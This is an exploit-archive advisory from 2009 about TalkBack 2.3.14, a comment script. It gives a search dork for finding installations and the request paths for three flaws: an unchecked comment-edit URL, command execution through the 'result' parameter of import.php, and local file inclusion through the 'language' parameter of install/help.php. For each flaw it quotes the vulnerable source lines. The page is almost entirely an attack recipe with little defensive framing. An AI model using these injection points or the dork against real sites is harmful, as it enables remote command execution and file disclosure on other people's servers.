[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : TalkBack 2.3.14 Multiple Remote Vulnerabilities
# Published : 2009-07-09
# Author : JiKo
# Previous Title : EasyVillaRentalSite (Id) Remote SQL Injection Vulnerability
# Next Title : Siteframe CMS 3.2.x SQL Injection/phpinfo() Multiple Vulnerabilities


JIKO No-exploit.Com
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
        Code;
        $last_line = system($command, $result);
Local File ~[+]
        Note : if floder install not deleted
http://localhost/test/talkback/install/help.php?language=[File]
    code;
        $file = "../language/{$_REQUEST['language']}.php";
    if (!is_file($file))
        exit("Language file '$file' does not exist");
    include ($file);

# www.Syue.com [2009-07-09]